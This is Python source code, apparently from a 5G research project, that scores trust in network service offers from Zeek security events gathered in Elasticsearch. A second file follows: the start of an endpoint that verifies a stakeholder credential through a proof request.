n_ts = float(last_trust_score ["trust_value"]) + reward_and_punishment * ((1-float(last_trust_score ["trust_value"]))/10)
new_trust_score = min(n_ts, 1)
elif final_security_reward_and_punishment < 0.5:
"The lower value the higher punishment"
reward_and_punishment = 0.5 - final_security_reward_and_punishment
n_ts = float(last_trust_score ["trust_value"]) - reward_and_punishment * ((1-float(last_trust_score ["trust_value"]))/10)
new_trust_score = max(0, n_ts)
else:
new_trust_score = last_trust_score ["trust_value"]
final_security_reward_and_punishment = total_reward_and_punishment
print("No new Security Analysis events have been generated in the last time-window")
print("\n\tPrevious Trust Score", last_trust_score ["trust_value"], " --- Updated Trust Score After Reward and Punishment --->", round(new_trust_score, 4), "\n")
last_trust_score["trustor"]["reward_and_punishment"] = final_security_reward_and_punishment
last_trust_score["trust_value"] = round(new_trust_score, 4)
last_trust_score["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
peerTrust.historical.append(last_trust_score)
#mongoDB.insert_one(last_trust_score)
#itm = db.doctors.find_one({"email":doc_mail})
itm = mongoDB.find_one({'trustee.offerDID': offerDID, 'trustor.trusteeDID': last_trust_score["trustor"]["trusteeDID"]})
if itm != None:
mongoDB.replace_one({'_id': itm.get('_id')}, last_trust_score, True)
def get_resource_list_network_service_offer(self, offerDID):
""" This method retrieves one or more resources involved in a Network Service/Slice Product Offering"""
"5GBarcelona"
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering/did/"+offerDID)
"5TONIC"
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering/did/")
response = json.loads(response.text)
product_specification = response['productSpecification']['href']
response = requests.get(product_specification)
response = json.loads(response.text)
service_specification = response['serviceSpecification'][0]['href']
response = requests.get(service_specification)
response = json.loads(response.text)
resource_specification = response['resourceSpecification']
return resource_specification
def generic_reward_and_punishment_based_on_security(self, CURRENT_TIME_WINDOW, offerDID, offer_type, CONN_DIMENSION_WEIGHTING,
NOTICE_DIMENSION_WEIGHTING, WEIRD_DIMENSION_WEIGHTING,
STATS_DIMENSION_WEIGHTING):
""" This methods collects from ElasticSearch new security effects and computes the reward or punishment based on
the type of offers. So, different sets of events are linked to each PO as well as weighting factors """
"Global variable definition"
global icmp_orig_pkts
global tcp_orig_pkts
global udp_orig_pkts
"Local variable definition"
conn_info = []
notice_info = []
weird_info = []
stats_info = []
first_conn_value = 0
first_notice_value = 0
first_weird_value = 0
first_stats_value = 0
indices_info = self.get_ELK_information(offerDID)
if len(indices_info) == 0:
print('No matches were detected for the ', offerDID, 'index in the Security Analysis Service logs')
for index in indices_info:
for hit in index["hits"]["hits"]:
if "conn.log" in hit["_source"]["log"]["file"]["path"] and hit not in conn_info:
conn_info.append(hit)
elif "notice.log" in hit["_source"]["log"]["file"]["path"] and hit not in notice_info:
notice_info.append(hit)
elif "weird.log" in hit["_source"]["log"]["file"]["path"] and hit not in weird_info:
weird_info.append(hit)
elif "stats.log" in hit["_source"]["log"]["file"]["path"] and hit not in stats_info:
stats_info.append(hit)
"Now, we can have multiple VMs linked to the same slices"
#first_conn_value = (first_conn_value + self.conn_log(CURRENT_TIME_WINDOW, conn_info))/len(indices_info)
#first_notice_value = (first_notice_value + self.notice_log(CURRENT_TIME_WINDOW, offer_type, notice_info))/len(indices_info)
#first_weird_value = (first_weird_value + self.weird_log(CURRENT_TIME_WINDOW, offer_type, weird_info))/len(indices_info)
#first_stats_value = (first_stats_value + self.stats_log(CURRENT_TIME_WINDOW, icmp_orig_pkts, tcp_orig_pkts, udp_orig_pkts, stats_info))/len(indices_info)
"After option 1 will be developed, we will only need to compute 1 value per dimension"
if len(indices_info) > 0:
first_conn_value = self.conn_log(CURRENT_TIME_WINDOW, conn_info)
first_notice_value = self.notice_log(CURRENT_TIME_WINDOW, offer_type, notice_info)
first_weird_value = self.weird_log(CURRENT_TIME_WINDOW, offer_type, weird_info)
first_stats_value = self.stats_log(CURRENT_TIME_WINDOW, icmp_orig_pkts, tcp_orig_pkts, udp_orig_pkts, stats_info)
if first_conn_value == 0 and first_stats_value == 0 and first_weird_value == 0 and first_notice_value == 0:
"We don't have new SAS events in the current time-window"
return -1
return CONN_DIMENSION_WEIGHTING * first_conn_value + NOTICE_DIMENSION_WEIGHTING * first_notice_value \
+ WEIRD_DIMENSION_WEIGHTING * first_weird_value + STATS_DIMENSION_WEIGHTING * first_stats_value
else:
"In this case, the PO does not have a Service Specification and in consequence the SAS cannot generate an index"
return -1
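# Illustrative example (hypothetical numbers): for an edge offer the weights are 0.2/0.35/0.25/0.2
# (conn/notice/weird/stats); with dimension values conn = 0.8, notice = 0.9, weird = 0.7 and stats = 0.6
# the method would return 0.2*0.8 + 0.35*0.9 + 0.25*0.7 + 0.2*0.6 = 0.77.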
def get_ELK_information(self, offerDID):
""" This method gets all new index from the ELK"""
load_dotenv()
elk_address = os.getenv('ELK')
response = requests.post(elk_address+'_cat/indices')
response = response.text
with open('output.txt', 'w') as my_data_file:
my_data_file.write(response)
my_data_file.close()
instances = []
indices_info = []
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering/did/"+offerDID)
"5TONIC"
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering/did/")
response = json.loads(response.text)
product_specification = response['productSpecification']['href']
response = requests.get(product_specification)
response = json.loads(response.text)
if len(response['serviceSpecification']) > 0:
id_service_specification = response['serviceSpecification'][0]['id']
else:
id_service_specification = 'None'
print('The PO does not contain the serviceSpecification field')
with open('output.txt', 'r') as f:
for line in f:
if 'yellow' in line:
indice = line.split('open ')[1].split(" ")[0]
if id_service_specification in indice:
instances.append(indice)
for instance in instances:
response = requests.post(elk_address+instance+'/_search')
response = json.loads(response.text)
indices_info.append(response)
return indices_info
def conn_log(self, time_window, conn_info):
""" This function will compute the security level of an ongoing trust relationship between two operators from the
percentage of network packages correctly sent """
global icmp_orig_pkts
global tcp_orig_pkts
global udp_orig_pkts
"Weight definition"
ICMP = 0.3
TCP = 0.3
UDP = 0.4
"Variable definition"
icmp_orig_pkts = 0
tcp_orig_pkts = 0
udp_orig_pkts = 0
icmp_resp_pkts = 0
tcp_resp_pkts = 0
udp_resp_pkts = 0
timestamp = time.time()
timestamp_limit = timestamp - time_window
for log in conn_info:
timestamp_log = time.mktime(time.strptime(log["_source"]["@timestamp"].split(".")[0], '%Y-%m-%dT%H:%M:%S'))
if timestamp_log >= timestamp_limit:
if log["_source"]["network"]["transport"] == "icmp":
icmp_orig_pkts += log["_source"]["source"]["packets"]
icmp_resp_pkts += log["_source"]["destination"]["packets"]
elif log["_source"]["network"]["transport"] == "tcp":
tcp_orig_pkts += log["_source"]["source"]["packets"]
tcp_resp_pkts += log["_source"]["destination"]["packets"]
elif log["_source"]["network"]["transport"] == "udp":
udp_orig_pkts += log["_source"]["source"]["packets"]
udp_resp_pkts += log["_source"]["destination"]["packets"]
try:
icmp_packet_hit_rate = icmp_resp_pkts/icmp_orig_pkts
except ZeroDivisionError:
icmp_packet_hit_rate = 0
try:
tcp_packet_hit_rate = tcp_resp_pkts/tcp_orig_pkts
except ZeroDivisionError:
tcp_packet_hit_rate = 0
try:
udp_packet_hit_rate = udp_resp_pkts/udp_orig_pkts
except ZeroDivisionError:
udp_packet_hit_rate = 0
final_conn_value = ICMP * icmp_packet_hit_rate + TCP * tcp_packet_hit_rate + UDP * udp_packet_hit_rate
return final_conn_value
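# Illustrative example (hypothetical numbers): if 100% of ICMP, 90% of TCP and 80% of UDP packets
# received a response, conn_log returns 0.3*1.0 + 0.3*0.9 + 0.4*0.8 = 0.89.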
def notice_log(self, time_window, offer_type, notice_info):
""" This function will compute the security level of an ongoing trust relationship between two operators from
critical security events detected by the Zeek """
"Generic label definition"
TOO_MUCH_LOSS = "CaptureLoss::Too_Much_Loss"
TOO_LITTLE_TRAFFIC = " CaptureLoss::Too_Little_Traffic"
WEIRD_ACTIVITY = "Weird::Activity"
PACKET_FILTER = "PacketFilter::Dropped_Packets"
SOFTWARE_VULNERABLE = "Software::Vulnerable_Version"
SQL_INJECTION_ATTACKER = "HTTP::SQL_Injection_Attacker"
SQL_INJECTION_VICTIM = "HTTP::SQL_Injection_Victim"
PASSWORD_GUESSING = "SSH::Password_Guessing"
"Edge specific label definition"
TOO_LONG_TO_COMPILE_FAILURE = "PacketFilter::Too_Long_To_Compile_Filter"
ADDRESS_SCAN = "Scan::Address_Scan"
PORT_SCAN = "Scan::Port_Scan"
MALWARE_HASH = "TeamCymruMalwareHashRegistry::Match"
TRACEROUTE = "Traceroute::Detected"
BLOCKED_HOST = "SMTP::Blocklist_Blocked_Host"
SUSPICIOUS_ORIGINATION = "SMTP::Suspicious_Origination"
CERTIFICATE_EXPIRED = "SSL::Certificate_Expired"
CERTIFICATE_NOT_VALID = "SSL::Certificate_Not_Valid_Yet"
SSL_HEARTBEAT_ATTACK = "Heartbleed::SSL_Heartbeat_Attack"
SSL_HEARTBEAT_ATTACK_SUCCESS = "Heartbleed::SSL_Heartbeat_Attack_Success"
SSL_WEAK_KEY = "SSL::Weak_Key"
SSL_OLD_VERSION = "SSL::Old_Version"
SSL_WEAK_CIPHER = "SSL::Weak_Cipher"
"Cloud specific label definition"
SERVER_FOUND = "ProtocolDetector::Server_Found"
BRUTEFORCING = "FTP::Bruteforcing"
"VNF/CNF specific label definition"
SENSITIVE_SIGNATURE = "Signatures::Sensitive_Signature"
COMPILE_FAILURE_PACKET_FILTER = "PacketFilter::Compile_Failure"
INSTALL_FAILURE = "PacketFilter::Install_Failure"
CONTENT_GAP = "Conn::Content_Gap"
"By default notice.log file is gathered after 15 minutes"
TIME_MONITORING_EVENT = 900
LAST_FIVE_TIME_MONITORING_EVENT = 4500
"List of general labels"
events_to_monitor = []
events_to_monitor.append(TOO_MUCH_LOSS)
events_to_monitor.append(TOO_LITTLE_TRAFFIC)
events_to_monitor.append(WEIRD_ACTIVITY)
events_to_monitor.append(PACKET_FILTER)
events_to_monitor.append(SOFTWARE_VULNERABLE)
events_to_monitor.append(PASSWORD_GUESSING)
"List of specific labels regarding the type of offer"
edge_events_to_monitor = []
edge_events_to_monitor.append(PORT_SCAN)
edge_events_to_monitor.append(TOO_LONG_TO_COMPILE_FAILURE)
edge_events_to_monitor.append(COMPILE_FAILURE_PACKET_FILTER)
edge_events_to_monitor.append(INSTALL_FAILURE)
edge_events_to_monitor.append(MALWARE_HASH)
edge_events_to_monitor.append(TRACEROUTE)
edge_events_to_monitor.append(ADDRESS_SCAN)
edge_events_to_monitor.append(BRUTEFORCING)
edge_events_to_monitor.append(BLOCKED_HOST)
edge_events_to_monitor.append(SUSPICIOUS_ORIGINATION)
edge_events_to_monitor.append(CERTIFICATE_EXPIRED)
edge_events_to_monitor.append(CERTIFICATE_NOT_VALID)
edge_events_to_monitor.append(SSL_HEARTBEAT_ATTACK)
edge_events_to_monitor.append(SSL_HEARTBEAT_ATTACK_SUCCESS)
edge_events_to_monitor.append(SSL_WEAK_KEY)
edge_events_to_monitor.append(SSL_OLD_VERSION)
edge_events_to_monitor.append(SSL_WEAK_CIPHER)
edge_events_to_monitor.append(SQL_INJECTION_ATTACKER)
edge_events_to_monitor.append(SQL_INJECTION_VICTIM)
cloud_events_to_monitor = []
cloud_events_to_monitor.append(PORT_SCAN)
cloud_events_to_monitor.append(COMPILE_FAILURE_PACKET_FILTER)
cloud_events_to_monitor.append(INSTALL_FAILURE)
cloud_events_to_monitor.append(SERVER_FOUND)
cloud_events_to_monitor.append(MALWARE_HASH)
cloud_events_to_monitor.append(TRACEROUTE)
cloud_events_to_monitor.append(ADDRESS_SCAN)
cloud_events_to_monitor.append(BRUTEFORCING)
cloud_events_to_monitor.append(CERTIFICATE_EXPIRED)
cloud_events_to_monitor.append(CERTIFICATE_NOT_VALID)
cloud_events_to_monitor.append(SSL_HEARTBEAT_ATTACK)
cloud_events_to_monitor.append(SSL_HEARTBEAT_ATTACK_SUCCESS)
cloud_events_to_monitor.append(SSL_WEAK_KEY)
cloud_events_to_monitor.append(SSL_OLD_VERSION)
cloud_events_to_monitor.append(SSL_WEAK_CIPHER)
cloud_events_to_monitor.append(SQL_INJECTION_ATTACKER)
cloud_events_to_monitor.append(SQL_INJECTION_VICTIM)
vnf_cnf_events_to_monitor = []
vnf_cnf_events_to_monitor.append(SENSITIVE_SIGNATURE)
vnf_cnf_events_to_monitor.append(COMPILE_FAILURE_PACKET_FILTER)
vnf_cnf_events_to_monitor.append(INSTALL_FAILURE)
vnf_cnf_events_to_monitor.append(MALWARE_HASH)
vnf_cnf_events_to_monitor.append(TRACEROUTE)
vnf_cnf_events_to_monitor.append(ADDRESS_SCAN)
vnf_cnf_events_to_monitor.append(PORT_SCAN)
vnf_cnf_events_to_monitor.append(CONTENT_GAP)
"Variable definition"
actual_event_number = 0
previous_monitoring_window_event_number = 0
last_five_monitoring_window_event_number = 0
timestamp = time.time()
timestamp_limit = timestamp - time_window
previous_event_monitoring_timestamp = timestamp - TIME_MONITORING_EVENT
last_five_event_monitoring_timestamp = timestamp - LAST_FIVE_TIME_MONITORING_EVENT
for log in notice_info:
timestamp_log = time.mktime(time.strptime(log["_source"]["@timestamp"].split(".")[0], '%Y-%m-%dT%H:%M:%S'))
if log["_source"]["zeek"]["notice"]["name"] in events_to_monitor and timestamp_log >= timestamp_limit:
actual_event_number += 1
elif log["_source"]["zeek"]["notice"]["name"] in events_to_monitor and timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_event_number += 1
last_five_monitoring_window_event_number += 1
elif log["_source"]["zeek"]["notice"]["name"] in events_to_monitor and timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["notice"]["name"] in edge_events_to_monitor and \
timestamp_log >= timestamp_limit:
actual_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["notice"]["name"] in edge_events_to_monitor and \
timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_event_number += 1
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["notice"]["name"] in edge_events_to_monitor and \
timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["notice"]["name"] in cloud_events_to_monitor and \
timestamp_log >= timestamp_limit:
actual_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["notice"]["name"] in cloud_events_to_monitor and \
timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_event_number += 1
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["notice"]["name"] in cloud_events_to_monitor and \
timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_event_number += 1
elif (offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf') and log["_source"]["zeek"]["notice"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= timestamp_limit:
actual_event_number += 1
elif (offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf') and log["_source"]["zeek"]["notice"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_event_number += 1
last_five_monitoring_window_event_number += 1
elif (offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf') and log["_source"]["zeek"]["notice"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_event_number += 1
try:
last_window_notice_events = actual_event_number/(previous_monitoring_window_event_number + actual_event_number)
except ZeroDivisionError:
last_window_notice_events = 0
try:
five_last_window_notice_events = actual_event_number / (actual_event_number + (last_five_monitoring_window_event_number / 5))
except ZeroDivisionError:
five_last_window_notice_events = 0
final_notice_value = 1 - ((last_window_notice_events + five_last_window_notice_events) / 2)
return final_notice_value
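# Illustrative example (hypothetical numbers): if the two ratios computed above are 0.4 and 0.6, the
# method returns 1 - (0.4 + 0.6)/2 = 0.5; fewer notice events in the current window (lower ratios)
# push the value towards 1.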
def weird_log(self, time_window, offer_type, weird_info):
""" This function will compute the security level of an ongoing trust relationship between two operators from
weird events detected by the Zeek """
"Label definition"
DNS_UNMTATCHED_REPLY = "dns_unmatched_reply"
ACTIVE_CONNECTION_REUSE = "active_connection_reuse"
SPLIT_ROUTING = "possible_split_routing"
INAPPROPIATE_FIN = "inappropriate_FIN"
FRAGMENT_PAKCKET = "fragment_with_DF"
BAD_ICMP_CHECKSUM = "bad_ICMP_checksum"
BAD_UDP_CHECKSUM = "bad_UDP_checksum"
BAD_TCP_CHECKSUM = "bad_TCP_checksum"
TCP_CHRISTMAS = "TCP_Christmas"
UNSCAPED_PERCENTAGE_URI = "unescaped_%_in_URI"
ILLEGAL_ENCODING = "base64_illegal_encoding"
BAD_HTTP_REPLY = "bad_HTTP_reply"
MALFORMED_SSH_IDENTIFICATION = "malformed_ssh_identification"
MALFORMED_SSH_VERSION = "malformed_ssh_version"
"List of labels"
weird_event_list = []
weird_event_list.append(DNS_UNMTATCHED_REPLY)
weird_event_list.append(ACTIVE_CONNECTION_REUSE)
weird_event_list.append(ILLEGAL_ENCODING)
"List of specific labels regarding the type of offer"
edge_events_to_monitor = []
edge_events_to_monitor.append(SPLIT_ROUTING)
edge_events_to_monitor.append(BAD_ICMP_CHECKSUM)
edge_events_to_monitor.append(BAD_UDP_CHECKSUM)
edge_events_to_monitor.append(BAD_TCP_CHECKSUM)
edge_events_to_monitor.append(TCP_CHRISTMAS)
edge_events_to_monitor.append(UNSCAPED_PERCENTAGE_URI)
edge_events_to_monitor.append(BAD_HTTP_REPLY)
cloud_events_to_monitor = []
cloud_events_to_monitor.append(SPLIT_ROUTING)
cloud_events_to_monitor.append(BAD_ICMP_CHECKSUM)
cloud_events_to_monitor.append(BAD_UDP_CHECKSUM)
cloud_events_to_monitor.append(BAD_TCP_CHECKSUM)
cloud_events_to_monitor.append(TCP_CHRISTMAS)
cloud_events_to_monitor.append(BAD_HTTP_REPLY)
vnf_cnf_events_to_monitor = []
vnf_cnf_events_to_monitor.append(INAPPROPIATE_FIN)
vnf_cnf_events_to_monitor.append(FRAGMENT_PAKCKET)
vnf_cnf_events_to_monitor.append(MALFORMED_SSH_IDENTIFICATION)
vnf_cnf_events_to_monitor.append(MALFORMED_SSH_VERSION)
"Variable definition"
actual_weird_event_number = 0
previous_monitoring_window_weird_event_number = 0
last_five_monitoring_window_weird_event_number = 0
"By default weird.log file is gathered after 15 minutes, VERIFY!"
TIME_MONITORING_WEIRD_EVENT = 900
LAST_FIVE_TIME_MONITORING_WEIRD_EVENT = 4500
timestamp = time.time()
timestamp_limit = timestamp - time_window
previous_event_monitoring_timestamp = timestamp - TIME_MONITORING_WEIRD_EVENT
last_five_event_monitoring_timestamp = timestamp - LAST_FIVE_TIME_MONITORING_WEIRD_EVENT
for log in weird_info:
timestamp_log = time.mktime(time.strptime(log["_source"]["@timestamp"].split(".")[0], '%Y-%m-%dT%H:%M:%S'))
if log["_source"]["zeek"]["weird"]["name"] in weird_event_list and timestamp_log >= timestamp_limit:
actual_weird_event_number += 1
elif log["_source"]["zeek"]["weird"]["name"] in weird_event_list and timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_weird_event_number += 1
last_five_monitoring_window_weird_event_number += 1
elif log["_source"]["zeek"]["weird"]["name"] in weird_event_list and timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["weird"]["name"] in edge_events_to_monitor and \
timestamp_log >= timestamp_limit:
actual_weird_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["weird"]["name"] in edge_events_to_monitor and \
timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_weird_event_number += 1
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["weird"]["name"] in edge_events_to_monitor and \
timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["weird"]["name"] in cloud_events_to_monitor and \
timestamp_log >= timestamp_limit:
actual_weird_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["weird"]["name"] in cloud_events_to_monitor and \
timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_weird_event_number += 1
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["weird"]["name"] in cloud_events_to_monitor and \
timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_weird_event_number += 1
elif (offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf') and log["_source"]["zeek"]["weird"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= timestamp_limit:
actual_weird_event_number += 1
elif (offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf') and log["_source"]["zeek"]["weird"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_weird_event_number += 1
last_five_monitoring_window_weird_event_number += 1
elif (offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf') and log["_source"]["zeek"]["weird"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_weird_event_number += 1
try:
last_window_weird_events = actual_weird_event_number/(previous_monitoring_window_weird_event_number + actual_weird_event_number)
except ZeroDivisionError:
last_window_weird_events = 0
try:
five_last_window_weird_events = actual_weird_event_number / (actual_weird_event_number + (last_five_monitoring_window_weird_event_number / 5))
except ZeroDivisionError:
five_last_window_weird_events = 0
final_weird_value = 1 - (( last_window_weird_events + five_last_window_weird_events ) / 2)
return final_weird_value
def stats_log(self, time_window, icmp_sent_pkts, tcp_sent_pkts, udp_sent_pkts, stat_info):
""" This function will compute the security level of an ongoing trust relationship between two operators from the
percentage of network packages sent and the packets finally analyzed by Zeek"""
"Global variable definition"
global icmp_orig_pkts
global tcp_orig_pkts
global udp_orig_pkts
"Weight definition"
ICMP = 0.3
TCP = 0.3
UDP = 0.4
"Variable definition"
icmp_orig_pkts = icmp_sent_pkts
tcp_orig_pkts = tcp_sent_pkts
udp_orig_pkts = udp_sent_pkts
icmp_pkts_analyzed_by_zeek = 0
tcp_pkts_analyzed_by_zeek = 0
udp_pkts_analyzed_by_zeek = 0
timestamp = time.time()
timestamp_limit = timestamp - time_window
for log in stat_info:
timestamp_log = time.mktime(time.strptime(log["_source"]["@timestamp"].split(".")[0], '%Y-%m-%dT%H:%M:%S'))
if timestamp_log >= timestamp_limit:
icmp_pkts_analyzed_by_zeek += log["_source"]["zeek"]["connections"]["icmp"]["count"]
tcp_pkts_analyzed_by_zeek += log["_source"]["zeek"]["connections"]["tcp"]["count"]
udp_pkts_analyzed_by_zeek += log["_source"]["zeek"]["connections"]["udp"]["count"]
try:
icmp_packet_rate_analyzed_by_zeek = icmp_pkts_analyzed_by_zeek/icmp_orig_pkts
except ZeroDivisionError:
icmp_packet_rate_analyzed_by_zeek = 0
try:
tcp_packet_rate_analyzed_by_zeek = tcp_pkts_analyzed_by_zeek/tcp_orig_pkts
except ZeroDivisionError:
tcp_packet_rate_analyzed_by_zeek = 0
try:
udp_packet_rate_analyzed_by_zeek = udp_pkts_analyzed_by_zeek/udp_orig_pkts
except ZeroDivisionError:
udp_packet_rate_analyzed_by_zeek = 0
final_stats_value = ICMP * icmp_packet_rate_analyzed_by_zeek + TCP * tcp_packet_rate_analyzed_by_zeek + UDP * \
udp_packet_rate_analyzed_by_zeek
return final_stats_value
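# Illustrative example (hypothetical numbers): if Zeek analyzed 90% of the ICMP, 80% of the TCP and
# 70% of the UDP packets reported in conn.log, stats_log returns 0.3*0.9 + 0.3*0.8 + 0.4*0.7 = 0.79.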
class stop_relationship(Resource):
def post(self):
"""This method stops a trust relationship"""
req = request.data.decode("utf-8")
information = json.loads(req)
print("\n$$$$$$$$$$$$$$ Finishing a trust relationship with", information['offerDID'],"$$$$$$$$$$$$$$\n")
for thread in threads:
if information['offerDID'] in thread:
thread['stop_event'].set()
for i in range(len(threads)):
if information['offerDID'] in threads[i]:
del threads[i]
print("\n$$$$$$$$$$$$$$ Finished a trust relationship with", information['offerDID'],"$$$$$$$$$$$$$$\n")
print("\n$$$$$$$$$$$$$$ Ending update trust level process on", information['offerDID'], "$$$$$$$$$$$$$$\n")
return 200
return 400
class query_trust_information(Resource):
def post(self):
""" This method will request a recommendation to a given recommender after looking in the interactions in the Data Lake"""
req = request.data.decode("utf-8")
information = json.loads(req)
last_trust_value = consumer.readLastTrustValues(peerTrust.historical, information["trustorDID"],
information["trusteeDID"], information['last_trustee_interaction_registered'],
information['currentInteractionNumber'])
return last_trust_value
class query_trust_score(Resource):
def post(self):
""" This method will request a recommendation to a given recommender after looking in the interactions in the Data Lake"""
req = request.data.decode("utf-8")
information = json.loads(req)
last_trust_value = consumer.readLastTrustValueOffer(peerTrust.historical, information["trustorDID"], information["trusteeDID"], information["offerDID"])
return {'trust_value': last_trust_value["trust_value"]}
class query_satisfaction_score(Resource):
def post(self):
""" This method will request a recommendation to a given recommender after looking in the interactions in the Data Lake"""
req = request.data.decode("utf-8")
information = json.loads(req)
last_user_satisfaction = consumer.readSatisfaction(peerTrust.historical, information["trustorDID"], information["trusteeDID"], information["offerDID"])
return {'userSatisfaction': last_user_satisfaction}
class notify_selection(Resource):
def post(self):
""" This method will request a recommendation to a given recommender after looking in the interactions in the Data Lake"""
req = request.data.decode("utf-8")
information = json.loads(req)
"The ISSM sends to the TRMF the final selected offer"
response = requests.post("http://localhost:5002/update_trust_level", data=json.dumps(information).encode("utf-8"))
return response.text
def launch_server_REST(port):
api.add_resource(initialise_offer_type, '/initialise_offer_type')
api.add_resource(start_data_collection, '/start_data_collection')
api.add_resource(gather_information, '/gather_information')
api.add_resource(compute_trust_level, '/compute_trust_level')
api.add_resource(store_trust_level, '/store_trust_level')
api.add_resource(update_trust_level, '/update_trust_level')
api.add_resource(stop_relationship, '/stop_relationship')
api.add_resource(query_trust_information, '/query_trust_information')
api.add_resource(query_trust_score, '/query_trust_score')
api.add_resource(query_satisfaction_score, '/query_satisfaction_score')
api.add_resource(notify_selection, '/notify_selection')
http_server = WSGIServer(('0.0.0.0', port), app)
http_server.serve_forever()
if __name__ == "__main__":
if len(sys.argv)!=2:
print("Usage: python3 trustManagementFramework.py [port]")
else:
port = int(sys.argv[1])
launch_server_REST(port)
``` |
{
"source": "5GZORRO/identity",
"score": 3
} |
#### File: app/authentication/verify_credential.py
```python
from typing import Optional, List
from fastapi import APIRouter, Response, status
from fastapi.responses import JSONResponse
from pydantic import BaseModel
import requests, json, sys, os, time, threading, jwt
from enum import Enum
from bson import ObjectId
from loguru import logger
from app.db import mongo_setup_admin
from app.bootstrap import setup_issuer
from app.bootstrap.key import holder_key
router = APIRouter(
prefix="/authentication",
tags=["authentication"]
)
class EncodedProof(BaseModel):
proof_token: str
header = {
'Content-Type': 'application/json'
}
@router.post("/verify_credential", status_code=202)
async def verify_credential(response: Response, body: EncodedProof):
# Read encoded object
try:
body_dict = body.dict()
key = os.environ["KEY"]
decoded = jwt.decode(body_dict["proof_token"], key, algorithms="HS256")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to read proof token")
# Check if Admin has emitted cred, and check if already verified
try:
subscriber = mongo_setup_admin.stakeholder_col.find_one({"stakeholderClaim.stakeholderDID": decoded["stakeholderDID"]})
if subscriber is None:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Stakeholder Credential wasn't emitted by this Admin Agent")
else:
if "verified" in subscriber:
return JSONResponse(status_code=status.HTTP_409_CONFLICT, content="Stakeholder Credential already verified")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to check who emitted Stakeholder Credential")
# SETUP CONNECTION
try:
setup_issuer.issuer_connection(decoded["service_endpoint"])
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to establish Issuer Connection")
# Perform validation
try:
verify_object = {
"connection_id": setup_issuer.connection_id,
"comment": "Verify Stakeholder",
"proof_request": {
"name": "<NAME>",
"version": "1.0",
"requested_attributes": {},
"requested_predicates": {
"0_timestamp_GE_uuid": {
"name": "timestamp",
"p_type": ">=",
"p_value": int(subscriber["timestamp"]),
"restrictions": [
{
"cred_def_id": subscriber["credential_definition_id"]
}
]
},
"1_timestamp_GE_uuid": {
"name": "timestamp",
"p_type": "<=",
"p_value": int(subscriber["timestamp"]),
"restrictions": [
{
"cred_def_id": subscriber["credential_definition_id"]
}
]
}
}
}
}
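# Note (editorial): the two predicates above bound the same "timestamp" attribute with ">=" and "<="
# against the stored value, which effectively requires the credential's timestamp to equal it while
# only revealing that the predicates hold (predicates prove the inequality without disclosing the value).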
URL = os.environ["ISSUER_AGENT_URL"]
resp = requests.post(URL+"/present-proof/send-request", data=json.dumps(verify_object), headers=header, timeout=60)
verify_info = json.loads(resp.text)
if verify_info["state"] == "request_sent":
# Check for verification true
#final_resp = requests.get(URL+"/present-proof/records/"+verify_info["presentation_exchange_id"], headers=header, timeout=60)
#check_true = json.loads(final_resp.text)
#print(check_true)
#time.sleep(10)
#if check_true["verified"] == "true":
# UPDATE REQUEST RECORD FROM MONGO
